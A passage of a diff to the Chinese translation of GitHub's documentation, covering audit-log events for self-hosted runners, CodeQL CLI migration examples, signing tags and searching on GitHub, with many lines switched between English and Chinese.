-| `repo.remove_self_hosted_runner`          | 当自托管运行器被移除时触发。 更多信息请参阅“[从仓库删除运行器](/actions/hosting-your-own-runners/removing-self-hosted-runners#removing-a-runner-from-a-repository)”。{% ifversion fpt or ghes > 3.1 or ghae or ghec %}
-| `repo.self_hosted_runner_online`          | 当运行器应用程序启动时触发。 只能使用 REST API 查看；在 UI 或 JSON/CSV 导出中不可见。 更多信息请参阅“[检查自托管运行器的状态](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)”。                                                                                                             |
-| `repo.self_hosted_runner_offline`         | 当运行器应用程序停止时触发。 只能使用 REST API 查看；在 UI 或 JSON/CSV 导出中不可见。 更多信息请参阅“[检查自托管运行器的状态](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)”。{% endif %}
-| `repo.self_hosted_runner_updated`         | 当运行器应用程序更新时触发。 可以使用 REST API 和 UI 查看；在 JSON /CSV 导出中不可见。 更多信息请参阅“[关于自托管运行器](/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners)”。                                                                                                                                                          |
+### Events for self-hosted runners
+| Action | Description
+|------------------|-------------------
+| `enterprise.register_self_hosted_runner` | Triggered when a new self-hosted runner is registered. For more information, see "[Adding a self-hosted runner to an enterprise](/actions/hosting-your-own-runners/adding-self-hosted-runners#adding-a-self-hosted-runner-to-an-enterprise)."
+| `enterprise.remove_self_hosted_runner` | Triggered when a self-hosted runner is removed.
+| `enterprise.runner_group_runners_updated` | Triggered when a runner group's member list is updated. For more information, see "[Set self-hosted runners in a group for an organization](/rest/reference/actions#set-self-hosted-runners-in-a-group-for-an-organization)."{% ifversion fpt or ghes > 3.1  or ghae or ghec %}
+| `enterprise.self_hosted_runner_online` | Triggered when the runner application is started. Can only be viewed using the REST API; not visible in the UI or JSON/CSV export. For more information, see "[Checking the status of a self-hosted runner](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)."
+| `enterprise.self_hosted_runner_offline` | Triggered when the runner application is stopped. Can only be viewed using the REST API; not visible in the UI or JSON/CSV export. For more information, see "[Checking the status of a self-hosted runner](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)."{% endif %}
+| `enterprise.self_hosted_runner_updated` | Triggered when the runner application is updated. Can be viewed using the REST API and the UI. This event is not included when you export the audit log as JSON data or a CSV file. For more information, see "[About self-hosted runners](/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners)" and "[Reviewing the audit log for your organization](/organizations/keeping-your-organization-secure/reviewing-the-audit-log-for-your-organization#exporting-the-audit-log)."
+| `org.register_self_hosted_runner` | Triggered when a new self-hosted runner is registered. For more information, see "[Adding a self-hosted runner to an organization](/actions/hosting-your-own-runners/adding-self-hosted-runners#adding-a-self-hosted-runner-to-an-organization)."
+| `org.remove_self_hosted_runner` | Triggered when a self-hosted runner is removed. For more information, see [Removing a runner from an organization](/actions/hosting-your-own-runners/removing-self-hosted-runners#removing-a-runner-from-an-organization).
+| `org.runner_group_runners_updated` | Triggered when a runner group's list of members is updated. For more information, see "[Set self-hosted runners in a group for an organization](/rest/reference/actions#set-self-hosted-runners-in-a-group-for-an-organization)."
+| `org.runner_group_updated` | Triggered when the configuration of a self-hosted runner group is changed. For more information, see "[Changing the access policy of a self-hosted runner group](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#changing-the-access-policy-of-a-self-hosted-runner-group)."{% ifversion fpt or ghes > 3.1 or ghae or ghec %}
+| `org.self_hosted_runner_online` | Triggered when the runner application is started. Can only be viewed using the REST API; not visible in the UI or JSON/CSV export. For more information, see "[Checking the status of a self-hosted runner](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)."
+| `org.self_hosted_runner_offline` | Triggered when the runner application is stopped. Can only be viewed using the REST API; not visible in the UI or JSON/CSV export. For more information, see "[Checking the status of a self-hosted runner](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)."{% endif %}
+| `org.self_hosted_runner_updated` | Triggered when the runner application is updated. Can be viewed using the REST API and the UI; not visible in the JSON/CSV export. For more information, see "[About self-hosted runners](/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners)."
+| `repo.register_self_hosted_runner` | Triggered when a new self-hosted runner is registered. For more information, see "[Adding a self-hosted runner to a repository](/actions/hosting-your-own-runners/adding-self-hosted-runners#adding-a-self-hosted-runner-to-a-repository)."
+| `repo.remove_self_hosted_runner` | Triggered when a self-hosted runner is removed. For more information, see "[Removing a runner from a repository](/actions/hosting-your-own-runners/removing-self-hosted-runners#removing-a-runner-from-a-repository)."{% ifversion fpt or ghes > 3.1 or ghae or ghec %}
+| `repo.self_hosted_runner_online` | Triggered when the runner application is started. Can only be viewed using the REST API; not visible in the UI or JSON/CSV export. For more information, see "[Checking the status of a self-hosted runner](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)."
+| `repo.self_hosted_runner_offline` | Triggered when the runner application is stopped. Can only be viewed using the REST API; not visible in the UI or JSON/CSV export. For more information, see "[Checking the status of a self-hosted runner](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#checking-the-status-of-a-self-hosted-runner)."{% endif %}
+| `repo.self_hosted_runner_updated` | Triggered when the runner application is updated. Can be viewed using the REST API and the UI; not visible in the JSON/CSV export. For more information, see "[About self-hosted runners](/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners)."

-### 自托管运行器组的事件
-| 操作                                       | 描述                                                                                                                                                                                           |
-| ---------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| `enterprise.runner_group_created`        | 在创建自托管运行器组时触发。 更多信息请参阅“[为企业创建自托管运行器组](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#creating-a-self-hosted-runner-group-for-an-enterprise)”。         |
-| `enterprise.runner_group_removed`        | 当自托管运行器组被移除时触发。 更多信息请参阅“[移除自托管运行器组](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#removing-a-self-hosted-runner-group)”。                             |
-| `enterprise.runner_group_runner_removed` | 当 REST API 用于从组中删除自托管运行器时触发。                                                                                                                                                                 |
-| `enterprise.runner_group_runners_added`  | 当自托管运行器添加到组时触发。 更多信息请参阅“[将自托管运行器移动到组](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#moving-a-self-hosted-runner-to-a-group)”。                        |
-| `enterprise.runner_group_updated`        | 当自托管运行器组的配置改变时触发。 更多信息请参阅“[更改自托管运行器组的访问策略](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#changing-the-access-policy-of-a-self-hosted-runner-group)”。 |
-| `org.runner_group_created`               | 在创建自托管运行器组时触发。 更多信息请参阅“[为组织创建自托管运行器组](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#creating-a-self-hosted-runner-group-for-an-organization)”。       |
-| `org.runner_group_removed`               | 当自托管运行器组被移除时触发。 更多信息请参阅“[移除自托管运行器组](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#removing-a-self-hosted-runner-group)”。                             |
-| `org.runner_group_updated`               | 当自托管运行器组的配置改变时触发。 更多信息请参阅“[更改自托管运行器组的访问策略](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#changing-the-access-policy-of-a-self-hosted-runner-group)”。 |
-| `org.runner_group_runners_added`         | 当自托管运行器添加到组时触发。 更多信息请参阅“[将自托管运行器移动到组](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#moving-a-self-hosted-runner-to-a-group)”。                        |
-| `org.runner_group_runner_removed`        | 当 REST API 用于从组中删除自托管运行器时触发。 更多信息请参阅“[为组织从组中删除自托管运行器](/rest/reference/actions#remove-a-self-hosted-runner-from-a-group-for-an-organization)”。                                                |
+### Events for self-hosted runner groups
+| Action | Description
+|------------------|-------------------
+| `enterprise.runner_group_created` | Triggered when a self-hosted runner group is created. For more information, see "[Creating a self-hosted runner group for an enterprise](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#creating-a-self-hosted-runner-group-for-an-enterprise)."
+| `enterprise.runner_group_removed` | Triggered when a self-hosted runner group is removed. For more information, see "[Removing a self-hosted runner group](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#removing-a-self-hosted-runner-group)."
+| `enterprise.runner_group_runner_removed` | Triggered when the REST API is used to remove a self-hosted runner from a group.
+| `enterprise.runner_group_runners_added` | Triggered when a self-hosted runner is added to a group. For more information, see "[Moving a self-hosted runner to a group](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#moving-a-self-hosted-runner-to-a-group)."
+| `enterprise.runner_group_updated` |Triggered when the configuration of a self-hosted runner group is changed. For more information, see "[Changing the access policy of a self-hosted runner group](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#changing-the-access-policy-of-a-self-hosted-runner-group)."
+| `org.runner_group_created` | Triggered when a self-hosted runner group is created. For more information, see "[Creating a self-hosted runner group for an organization](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#creating-a-self-hosted-runner-group-for-an-organization)."
+| `org.runner_group_removed` | Triggered when a self-hosted runner group is removed. For more information, see "[Removing a self-hosted runner group](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#removing-a-self-hosted-runner-group)."
+| `org.runner_group_updated` | Triggered when the configuration of a self-hosted runner group is changed. For more information, see "[Changing the access policy of a self-hosted runner group](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#changing-the-access-policy-of-a-self-hosted-runner-group)."
+| `org.runner_group_runners_added` | Triggered when a self-hosted runner is added to a group. For more information, see "[Moving a self-hosted runner to a group](/actions/hosting-your-own-runners/managing-access-to-self-hosted-runners-using-groups#moving-a-self-hosted-runner-to-a-group)."
+| `org.runner_group_runner_removed` | Triggered when the REST API is used to remove a self-hosted runner from a group. For more information, see "[Remove a self-hosted runner from a group for an organization](/rest/reference/actions#remove-a-self-hosted-runner-from-a-group-for-an-organization)."

-### 工作流程活动事件
+### Events for workflow activities

 {% data reusables.actions.actions-audit-events-workflow %}
--- a/translations/zh-CN/content/actions/using-workflows/events-that-trigger-workflows.md
+++ b/translations/zh-CN/content/actions/using-workflows/events-that-trigger-workflows.md
@@ -1220,7 +1220,7 @@ on:
 | --------------------------- | ---- | --------------------------- | --------------------------- |
 | Same as the caller workflow | n/a  | Same as the caller workflow | Same as the caller workflow |

-`workflow_call` is used to indicate that a workflow can be called by another workflow. When a workflow is triggered with the `workflow_call` event, the event payload in the called workflow is the same event payload from the calling workflow. For more information see, "[Reusing workflows](/actions/learn-github-actions/reusing-workflows)."
+`workflow_call` is used to indicate that a workflow can be called by another workflow. When a workflow is triggered with the `workflow_call` event, the event payload in the called workflow is the same event payload from the calling workflow. 更多信息请参阅“[重用工作流程](/actions/learn-github-actions/reusing-workflows)”。

 The example below only runs the workflow when it's called from another workflow:

--- a/translations/zh-CN/content/authentication/managing-commit-signature-verification/signing-tags.md
+++ b/translations/zh-CN/content/authentication/managing-commit-signature-verification/signing-tags.md
@@ -23,7 +23,7 @@ topics:
  $ git tag -s <em>mytag</em>
  # Creates a signed tag
  ```
-2. 通过运行 `git tag -v [tag-name]` 验证您签名的标记。
+2. Verify your signed tag by running `git tag -v [tag-name]`.
  ```shell
  $ git tag -v <em>mytag</em>
  # Verifies the signed tag
--- a/translations/zh-CN/content/code-security/code-scanning/using-codeql-code-scanning-with-your-existing-ci-system/migrating-from-the-codeql-runner-to-codeql-cli.md
+++ b/translations/zh-CN/content/code-security/code-scanning/using-codeql-code-scanning-with-your-existing-ci-system/migrating-from-the-codeql-runner-to-codeql-cli.md
@@ -34,29 +34,29 @@ topics:

 使用 {% data variables.product.prodname_codeql_cli %} 分析代码库的典型工作流程具有以下步骤。
 - `codeql database create` 以创建 {% data variables.product.prodname_codeql %} 数据库。
-  - For compiled languages: Optionally provide a build command.
- `codeql database analyze` to run queries to analyze each {% data variables.product.prodname_codeql %} database and summarize the results in a SARIF file. This command must be run once for each language or database.
- `codeql github upload-results` to upload the resulting SARIF files to {% data variables.product.prodname_dotcom %}, to be displayed as code scanning alerts. This command must be run once for each language or SARIF file.
+  - 对于编译的语言：（可选）提供构建命令。
+- `codeql database analyze` 以运行查询，以分析每个 {% data variables.product.prodname_codeql %} 数据库，并在 SARIF 文件中概括结果。 必须对每种语言或每个数据库运行一次此命令。
+- `codeql github upload-results` 将生成的 SARIF 文件上传到 {% data variables.product.prodname_dotcom %}，显示为代码扫描警报。 必须对每种语言或每个 SARIF 文件运行一次此命令。

-The {% data variables.product.prodname_codeql_runner %} is multithreaded by default. The {% data variables.product.prodname_codeql_cli %} only uses a single thread by default, but allows you to specify the amount of threads you want it to use. If you want to replicate the behavior of the {% data variables.product.prodname_codeql_runner %} to use all threads available on the machine when using the {% data variables.product.prodname_codeql_cli %}, you can pass `--threads 0` to `codeql database analyze`.
+默认情况下，{% data variables.product.prodname_codeql_runner %} 是多线程的。 默认情况下，{% data variables.product.prodname_codeql_cli %} 仅使用单线程，但允许您指定希望它使用的线程数。 如果要复制 {% data variables.product.prodname_codeql_runner %} 的行为，以便在使用 {% data variables.product.prodname_codeql_cli %}时使用计算机上所有可用的线程，可以将 `--threads 0` 传递给 `codeql database analyze`。

-For more information, see "[Configuring {% data variables.product.prodname_codeql_cli %} in your CI system](/code-security/code-scanning/using-codeql-code-scanning-with-your-existing-ci-system/configuring-codeql-cli-in-your-ci-system)."
+更多信息请参阅“[在 CI 系统中配置 {% data variables.product.prodname_codeql_cli %}](/code-security/code-scanning/using-codeql-code-scanning-with-your-existing-ci-system/configuring-codeql-cli-in-your-ci-system)”。

-## Examples of common uses for the {% data variables.product.prodname_codeql_cli %}
+## {% data variables.product.prodname_codeql_cli %} 的常见使用示例

-### About the examples
+### 关于示例

-These examples assume that the source code has been checked out to the current working directory. If you use a different directory, change the `--source-root` argument and the build steps accordingly.
+这些示例假定源代码已检出到当前工作目录。 如果使用其他目录，请相应地更改 `--source-root` 参数和构建步骤。

-These examples also assume that the {% data variables.product.prodname_codeql_cli %} is placed on the current PATH.
+这些示例还假定 {% data variables.product.prodname_codeql_cli %} 位于当前 PATH 上。

-In these examples, a {% data variables.product.prodname_dotcom %} token with suitable scopes is stored in the `$TOKEN` environment variable and passed to the example commands via `stdin`, or is stored in the `$GITHUB_TOKEN` environment variable.
+在这些示例中，具有合适作用域的 {% data variables.product.prodname_dotcom %} 令牌存储在 `$TOKEN` 环境变量中，并通过 `stdin` 传递给示例命令，或者存储在 `$GITHUB_TOKEN` 环境变量中。

-The ref name and commit SHA being checked out and analyzed in these examples are known during the workflow. For a branch, use `refs/heads/BRANCH-NAME` as the ref. For the head commit of a pull request, use `refs/pull/NUMBER/head`. For a {% data variables.product.prodname_dotcom %}-generated merge commit of a pull request, use `refs/pull/NUMBER/merge`. The examples below all use `refs/heads/main`. If you use a different branch name, you must modify the sample code.
+在这些示例中检出和分析的引用名称和提交 SHA 在工作流程期间是已知的。 对于分支，请使用 `refs/heads/BRANCH-NAME` 作为引用。 对于拉取请求的头部提交，请使用 `refs/pull/NUMBER/head`。 对于 {% data variables.product.prodname_dotcom %} 生成的拉取请求合并提交，请使用 `refs/pull/NUMBER/merge`。 下面的示例都使用 `refs/heads/main`。 如果使用其他分支名称，则必须修改示例代码。

-### Single non-compiled language (JavaScript)
+### 单一非编译语言 (JavaScript)

-Runner:
+运行器：
 ```bash
 echo "$TOKEN" | codeql-runner-linux init --repository my-org/example-repo \
    --languages javascript \
@@ -85,7 +85,7 @@ echo "$TOKEN" | codeql github upload-results --repository=my-org/example-repo \

 对于编译语言或多种语言，可以采用类似的方法。

-Runner:
+运行器：
 ```bash
 echo "$TOKEN" | codeql-runner-linux init --repository my-org/example-repo \
    --languages javascript \
@@ -115,7 +115,7 @@ echo "$TOKEN" | codeql github upload-results --repository=my-org/example-repo \

 对于编译语言或多种语言，可以采用类似的方法。

-Runner:
+运行器：
 ```bash
 echo "$TOKEN" | codeql-runner-linux init --repository my-org/example-repo \
    --languages javascript \
@@ -144,7 +144,7 @@ echo "$TOKEN" | codeql github upload-results --repository=my-org/example-repo \

 ### 使用自动构建的单一编译语言 (Java)

-Runner:
+运行器：
 ```bash
 echo "$TOKEN" | codeql-runner-linux init --repository my-org/example-repo \
    --languages java \
@@ -178,7 +178,7 @@ echo "$TOKEN" | codeql github upload-results --repository=my-org/example-repo \

 ### 使用自定义构建命令的单一编译语言 (Java)

-Runner:
+运行器：
 ```bash
 echo "$TOKEN" | codeql-runner-linux init --repository my-org/example-repo \
    --languages java \
@@ -213,7 +213,7 @@ echo "$TOKEN" | codeql github upload-results --repository=my-org/example-repo \

 当无法使用自动构建器或显式构建命令行构建代码时，已编译语言的间接构建跟踪可让 {% data variables.product.prodname_codeql %} 检测 `init` 与 `analyze` 之间的所有构建步骤。 这在使用 CI 系统中预配置的构建步骤（如 azure DevOps 中的 `VSBuild` 和 `MSBuild` 任务）时非常有用。

-Runner:
+运行器：
 ```yaml
 - task: CmdLine@1
  displayName: CodeQL Initialization
@@ -335,7 +335,7 @@ CLI:

 此示例在 {% data variables.product.prodname_codeql_runner %} 中并非严格可行。 将仅分析一种语言（文件最多的编译语言）。

-Runner:
+运行器：
 ```bash
 echo "$TOKEN" | codeql-runner-linux init --repository my-org/example-repo \
    --languages cpp,python \
@@ -375,7 +375,7 @@ done

 ### 使用自定义构建命令的多种语言（C++、Python）

-Runner:
+运行器：
 ```bash
 echo "$TOKEN" | codeql-runner-linux init --repository my-org/example-repo \
    --languages cpp,python \
--- a/translations/zh-CN/content/pull-requests/index.md
+++ b/translations/zh-CN/content/pull-requests/index.md
@@ -1,6 +1,26 @@
 ---
 title: 拉取请求
-intro: Learn how to commit changes to a project and use pull requests to collaborate with others.
+intro: 'Learn how to use pull requests to suggest changes to a project, receive suggested changes to your own projects, and address issues in pull requests, such as merge conflicts.'
+introLinks:
+  overview: /pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests
+featuredLinks:
+  guides:
+    - /pull-requests/committing-changes-to-your-project/creating-and-editing-commits/changing-a-commit-message
+    - /pull-requests/collaborating-with-pull-requests/addressing-merge-conflicts/resolving-a-merge-conflict-using-the-command-line
+    - /pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/creating-and-deleting-branches-within-your-repository
+    - /pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/creating-a-pull-request
+  popular:
+    - /pull-requests/collaborating-with-pull-requests/reviewing-changes-in-pull-requests/about-pull-request-reviews
+    - /pull-requests/collaborating-with-pull-requests/addressing-merge-conflicts/resolving-a-merge-conflict-on-github
+    - /pull-requests/collaborating-with-pull-requests/working-with-forks/syncing-a-fork
+    - /pull-requests/collaborating-with-pull-requests/incorporating-changes-from-a-pull-request/merging-a-pull-request
+  guideCards:
+    - /pull-requests/collaborating-with-pull-requests/reviewing-changes-in-pull-requests/approving-a-pull-request-with-required-reviews
+    - /pull-requests/collaborating-with-pull-requests/incorporating-changes-from-a-pull-request/reverting-a-pull-request
+    - /pull-requests/committing-changes-to-your-project/troubleshooting-commits/why-are-my-commits-linked-to-the-wrong-user
+changelog:
+  label: pull-requests
+layout: product-landing
 shortTitle: 拉取请求
 versions:
  fpt: '*'
--- a/translations/zh-CN/content/search-github/getting-started-with-searching-on-github/about-searching-on-github.md
+++ b/translations/zh-CN/content/search-github/getting-started-with-searching-on-github/about-searching-on-github.md
@@ -1,6 +1,6 @@
 ---
-title: 关于在 GitHub 上搜索
-intro: '我们的集成搜索涵盖了 {% data variables.product.product_name %} 上的许多仓库、用户和代码行。'
+title: About searching on GitHub
+intro: 'Our integrated search covers the many repositories, users, and lines of code on {% data variables.product.product_name %}.'
 redirect_from:
  - /articles/using-the-command-bar
  - /articles/github-search-basics
@@ -18,55 +18,54 @@ versions:
 topics:
  - GitHub search
 ---
-
 {% data reusables.search.you-can-search-globally %}

- 要全局搜索所有 {% data variables.product.product_name %}，请在页面顶部的搜索字段中输入您要查找的内容，然后在搜索下拉菜单中选择“所有{% data variables.product.prodname_dotcom %}”。
- 要在特定仓库或组织中搜索，请导航到该仓库或组织页面，在页面顶部的搜索字段中输入要查找的内容，然后按 **Enter**。
+- To search globally across all of {% data variables.product.product_name %}, type what you're looking for into the search field at the top of any page, and choose "All {% data variables.product.prodname_dotcom %}" in the search drop-down menu.
+- To search within a particular repository or organization, navigate to the repository or organization page, type what you're looking for into the search field at the top of the page, and press **Enter**.

 {% note %}

-**注意：**
+**Notes:**

 {% ifversion fpt or ghes or ghec %}
 - {% data reusables.search.required_login %}{% endif %}
- {% data variables.product.prodname_pages %} 网站在 {% data variables.product.product_name %} 上不可搜索。 但如果源代码内容存在于仓库的默认分支中，您可以使用代码搜索来搜索。 更多信息请参阅“[搜索代码](/search-github/searching-on-github/searching-code)”。 有关 {% data variables.product.prodname_pages %} 的更多信息，请参阅“[什么是 GitHub Pages？ ](/articles/what-is-github-pages/)”
- 目前我们的搜索不支持精确匹配。
- 每当您在代码文件中搜索时，将仅返回每个文件中的前两个结果。
+- {% data variables.product.prodname_pages %} sites are not searchable on {% data variables.product.product_name %}. However you can search the source content if it exists in the default branch of a repository, using code search. For more information, see "[Searching code](/search-github/searching-on-github/searching-code)." For more information about {% data variables.product.prodname_pages %}, see "[What is GitHub Pages?](/articles/what-is-github-pages/)"
+- Currently our search doesn't support exact matching.
+- Whenever you are searching in code files, only the first two results in each file will be returned.

 {% endnote %}

-在 {% data variables.product.product_name %} 上搜索后，您可以对结果排序，或者单击侧栏中的任一语言进一步改进搜索。 更多信息请参阅“[对搜索结果排序](/search-github/getting-started-with-searching-on-github/sorting-search-results)”。
+After running a search on {% data variables.product.product_name %}, you can sort the results, or further refine them by clicking one of the languages in the sidebar. For more information, see "[Sorting search results](/search-github/getting-started-with-searching-on-github/sorting-search-results)."

-每次推送更改到 {% data variables.product.product_name %} 时，{% data variables.product.product_name %} 搜索都会使用 ElasticSearch 群集对项目编制索引。 议题和拉取请求在创建或修改时都会编制索引。
+{% data variables.product.product_name %} search uses an ElasticSearch cluster to index projects every time a change is pushed to {% data variables.product.product_name %}. Issues and pull requests are indexed when they are created or modified.

-## {% data variables.product.prodname_dotcom %} 上的搜索类型
+## Types of searches on {% data variables.product.prodname_dotcom %}

-您可以在 {% data variables.product.product_location %} 上可以访问的所有仓库中搜索以下信息。
+You can search for the following information across all repositories you can access on {% data variables.product.product_location %}.

- [仓库](/search-github/searching-on-github/searching-for-repositories)
- [主题](/search-github/searching-on-github/searching-topics)
- [议题和拉取请求](/search-github/searching-on-github/searching-issues-and-pull-requests){% ifversion fpt or ghec %}
- [讨论](/search-github/searching-on-github/searching-discussions){% endif %}
- [代码](/search-github/searching-on-github/searching-code)
- [提交](/search-github/searching-on-github/searching-commits)
- [用户](/search-github/searching-on-github/searching-users)
+- [Repositories](/search-github/searching-on-github/searching-for-repositories)
+- [Topics](/search-github/searching-on-github/searching-topics)
+- [Issues and pull requests](/search-github/searching-on-github/searching-issues-and-pull-requests){% ifversion fpt or ghec %}
+- [Discussions](/search-github/searching-on-github/searching-discussions){% endif %}
+- [Code](/search-github/searching-on-github/searching-code)
+- [Commits](/search-github/searching-on-github/searching-commits)
+- [Users](/search-github/searching-on-github/searching-users)
 - [Packages](/search-github/searching-on-github/searching-for-packages)
 - [Wikis](/search-github/searching-on-github/searching-wikis)

-## 使用可视界面搜索
+## Searching using a visual interface

 You can search {% data variables.product.product_name %} using the {% data variables.search.search_page_url %} or {% data variables.search.advanced_url %}. {% if command-palette %}Alternatively, you can use the interactive search in the {% data variables.product.prodname_command_palette %} to search your current location in the UI, a specific user, repository or organization, and globally across all of {% data variables.product.product_name %}, without leaving the keyboard. For more information, see "[{% data variables.product.prodname_command_palette %}](/get-started/using-github/github-command-palette)."{% endif %}

-{% data variables.search.advanced_url %} 提供用于构建搜索查询的可视界面。 您可以按各种因素过滤搜索，例如仓库具有的星标数或复刻数。 在填写高级搜索字段时，您的查询将在顶部搜索栏中自动构建。
+The {% data variables.search.advanced_url %} provides a visual interface for constructing search queries. You can filter your searches by a variety of factors, such as the number of stars or number of forks a repository has. As you fill in the advanced search fields, your query will automatically be constructed in the top search bar.

-![高级搜索](/assets/images/help/search/advanced_search_demo.gif)
+![Advanced Search](/assets/images/help/search/advanced_search_demo.gif)

 {% ifversion fpt or ghes or ghae or ghec %}

 ## Searching repositories on {% data variables.product.prodname_dotcom_the_website %} from your private enterprise environment

-If you use {% ifversion fpt or ghec %}{% data variables.product.prodname_ghe_server %} or {% data variables.product.prodname_ghe_managed %}{% else %}{% data variables.product.product_name %}{% endif %} and you're a member of a {% data variables.product.prodname_dotcom_the_website %} organization using {% data variables.product.prodname_ghe_cloud %}, an enterprise owner for your {% data variables.product.prodname_enterprise %} environment can enable {% data variables.product.prodname_github_connect %} so that you can search across both environments at the same time{% ifversion ghes or ghae %} from {% data variables.product.product_name %}{% endif %}. 更多信息请参阅以下文章。
+If you use {% ifversion fpt or ghec %}{% data variables.product.prodname_ghe_server %} or {% data variables.product.prodname_ghe_managed %}{% else %}{% data variables.product.product_name %}{% endif %} and you're a member of a {% data variables.product.prodname_dotcom_the_website %} organization using {% data variables.product.prodname_ghe_cloud %}, an enterprise owner for your {% data variables.product.prodname_enterprise %} environment can enable {% data variables.product.prodname_github_connect %} so that you can search across both environments at the same time{% ifversion ghes or ghae %} from {% data variables.product.product_name %}{% endif %}. For more information, see the following.

 {% ifversion fpt or ghes or ghec %}

@@ -75,7 +74,7 @@ If you use {% ifversion fpt or ghec %}{% data variables.product.prodname_ghe_ser

 {% ifversion ghes or ghae %}

-要按环境限制搜索范围，可以使用 {% data variables.search.advanced_url %} 上的过滤选项，或者使用 `environment:` 搜索前缀。 若只搜索 {% data variables.product.product_name %} 上的内容，请使用搜索语法 `environment:local`。 若只搜索 {% data variables.product.prodname_dotcom_the_website %} 上的内容，则使用 `environment:github`。
+To scope your search by environment, you can use a filter option on the {% data variables.search.advanced_url %} or you can use the `environment:` search prefix. To only search for content on {% data variables.product.product_name %}, use the search syntax `environment:local`. To only search for content on {% data variables.product.prodname_dotcom_the_website %}, use `environment:github`.

 Your enterprise owner on {% data variables.product.product_name %} can enable {% data variables.product.prodname_unified_search %} for all public repositories, all private repositories, or only certain private repositories in the connected {% data variables.product.prodname_ghe_cloud %} organization.

@@ -85,7 +84,7 @@ When you search from {% data variables.product.product_name %}, you can only sea

 {% endif %}

-## 延伸阅读
+## Further reading

- "[了解搜索语法](/search-github/getting-started-with-searching-on-github/understanding-the-search-syntax)"
- "[在 GitHub 上搜索](/articles/searching-on-github)"
+- "[Understanding the search syntax](/search-github/getting-started-with-searching-on-github/understanding-the-search-syntax)"
+- "[Searching on GitHub](/articles/searching-on-github)"
--- a/translations/zh-CN/data/reusables/actions/cd-templates-actions.md
+++ b/translations/zh-CN/data/reusables/actions/cd-templates-actions.md
@@ -1,3 +1,3 @@
-{% data variables.product.product_name %} offers CD starter workflow for several popular services, such as Azure Web App. To learn how to get started using a starter workflow, see "[Using starter workflows](/actions/learn-github-actions/using-starter-workflows)" or [browse the full list of deployment starter workflows](https://github.com/actions/starter-workflows/tree/main/deployments). You can also check out our more detailed guides for specific deployment workflows, such as "[Deploying to Azure App Service](/actions/deployment/deploying-to-azure-app-service)."
+{% data variables.product.product_name %} offers deployment starter workflows for several popular services, such as Azure Web App. To learn how to get started using a starter workflow, see "[Using starter workflows](/actions/learn-github-actions/using-starter-workflows)" or [browse the full list of deployment starter workflows](https://github.com/actions/starter-workflows/tree/main/deployments). You can also check out our more detailed guides for specific deployment workflows, such as "[Deploying to Azure App Service](/actions/deployment/deploying-to-azure-app-service)."

 Many service providers also offer actions on {% data variables.product.prodname_marketplace %} for deploying to their service. For the full list, see [{% data variables.product.prodname_marketplace %}](https://github.com/marketplace?category=deployment&type=actions).
--- a/translations/zh-CN/data/reusables/advanced-security/starter-workflow-overview.md
+++ b/translations/zh-CN/data/reusables/advanced-security/starter-workflow-overview.md
@@ -1 +1 @@
-{% data variables.product.product_name %} provides starter workflows for security features such as {% data variables.product.prodname_code_scanning %}. You can use these suggested workflows to construct your {% data variables.product.prodname_code_scanning %} workflows, instead of starting from scratch.
+{% data variables.product.product_name %} provides starter workflows for security features such as {% data variables.product.prodname_code_scanning %}. 您可以使用这些建议的工作流程来构建 {% data variables.product.prodname_code_scanning %} 工作流程，而不是从头开始。